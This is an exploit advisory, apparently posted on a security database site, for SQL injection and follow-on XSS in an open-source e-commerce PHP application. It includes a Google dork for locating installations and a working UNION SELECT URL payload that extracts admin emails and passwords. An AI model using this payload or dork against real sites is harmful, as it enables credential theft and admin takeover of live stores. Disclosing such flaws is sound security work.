Ecommerce-PHP-kurniaramadhan-1.0- Sql Injection To XSS

2024.12.25
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

**************************************************************************************** #Exploit Title: Ecommerce-PHP-kurniaramadhan-1.0- Sql Injection #Title of the Vulnerability: SQL Injection to XSS #Product Name: E-Commerce-PHP #Vendor: https://github.com/kurniaramadhan/ #Vulnerable Product Link: https://github.com/kurniaramadhan/E-Commerce-PHP #Date: 2024-12-23 #Exploit Author: Maloy Roy Orko #Google Dork: "Powered by kurniaramadhan" #Category:Webapps #Tested On: Android,Mac, Firefox ## Reference: https://www.websecurityinsights.my.id/2024/12/ecommerce-php-by-kurniaramadhan-sql.html https://portswigger.net/web-security/sql-injection ###Affected Components: Parameters,Admin Panel Create Product Fields. #Description: SQL Injection in "parameters" in "E-commerce PHP application By kurniaramadhan v 1.0" allows "remote" attacker "to dump database,gain admin access and leads to XSS as create product fields aren't protected" via "all parameters and create product fields". ###Proof of Concept: ### Demo : http://192.168.1.100:8080/blog-details.php?blog_id=1+union+select+concat(admin_email,0x3a,0x3c62723e3c62723e3c2f623e41646d696e2050617373776f72643a3c2f623e,0x3c62723e,admin_password),2,3,4,5,6,7,8,9+from+admins--+ ###Attack Vectors: To exploit vulnerability,he has to input exploits via parameters and then he can dump whole database or gain admin credentials and then he can login admin and as create products fields are not protected ,here XSS can be exploited then. ###Detailed Blog About The Poc: https://www.websecurityinsights.my.id/2024/12/ecommerce-php-by-kurniaramadhan-sql.html ********************************************************* #Discovered by: Maloy Roy Orko #Website: https://www.websecurityinsights.my.id/ ****************************************************************************************

References:

https://www.websecurityinsights.my.id/2024/12/ecommerce-php-by-kurniaramadhan-sql.html
https://portswigger.net/web-security/sql-injection


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top